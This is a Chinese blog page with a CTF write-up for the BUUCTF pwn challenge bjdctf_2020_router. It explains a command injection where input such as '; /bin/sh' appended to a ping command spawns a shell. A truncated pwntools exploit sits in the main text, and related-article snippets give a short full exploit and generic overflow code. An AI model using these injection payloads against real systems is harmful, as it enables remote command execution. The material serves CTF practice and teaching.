[BUUCTF-pwn]——bjdctf_2020_router

最新推荐文章于 2025-04-21 21:50:05 发布
原创 最新推荐文章于 2025-04-21 21:50:05 发布 · 430 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个在BJDCTF_2020比赛中的Router题目中存在的关键漏洞,通过发送特定的输入可以触发system调用执行/bin/sh命令,实现了远程代码执行。利用Python的pwn库构造了相应的payload并成功获取shell。

[BUUCTF-pwn]——bjdctf_2020_router

关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh")
分号是分割符

在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",27911)


p.sendline('1')
p.sendafter(
最低0.47元/天 解锁文章
BUUCTF pwn——bjdctf_2020_router
CNS-Enterprise BCC-1701-J
05-09 378
BUUCTF 做题练习
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 534
buuctf-pwn 001-016题wp
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3467
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
[BUUCTF]PWN——bjdctf_2020_router
mcmuyanga的博客
11-06 1171
bjdctf_2020_router 附件 步骤: 例行检查,64位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 会让我们选择,选择4.root,没什么用,但是注意了,这边选1会执行ping命令,尝试在ping命令后拼接ls,可以看到ls命令也执行了 这边利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行 3 . 利用这点,远程连接,尝试读出flag ...
BUUCTFbjdctf_2020_router
m0_51251108的博客
12-31 399
BUUCTFbjdctf_2020_router linux里面命令可以用;或&分隔,接下来就可以输我们要的命令了
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1707
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
bjdctf_2020_router
、moddemod
07-06 596
exp from pwn import * p = remote('node3.buuoj.cn', 28110) p.sendlineafter('choose:', b'1') p.sendlineafter('address', b'127.0.0.1 & sh') p.interactive()
BUUCTF-bjdctf_2020_router-WP
Rt1Text的博客
02-12 724
64位。
bjdctf_2020_router 1
weixin_74861133的博客
03-10 510
逻辑很简单,一直打印菜单,但仔细看来只有1有用,别的都是迷惑的,1中的功能先是读入一个0x10大小的字符串buf,然后使用strcat函数将buf拼接在dest后面,那这个dest是什么呢,我们先随便输入一个字符串跟据后面的提示想到dest应该是ping,因为ping命令后面什么也不跟会报错。还有一种方法就是上面已经有了dest的值了。
bjdctf-2020-router
m0_73743784的博客
09-01 374
其实知道 Linux 中的命令执行可以用;分隔就会非常简单。
bjdctf_2020_router--buuctf
最新发布
2301_81060697的博客
04-21 374
分号实现命令一行执行
BJDCTF2020 router
qq_39980610的博客
08-23 358
BJDCTF2020 router
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 591
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 356
buuctf-pwn 017-026题wp,重点关注babyheap
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 347
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 349
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1226
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值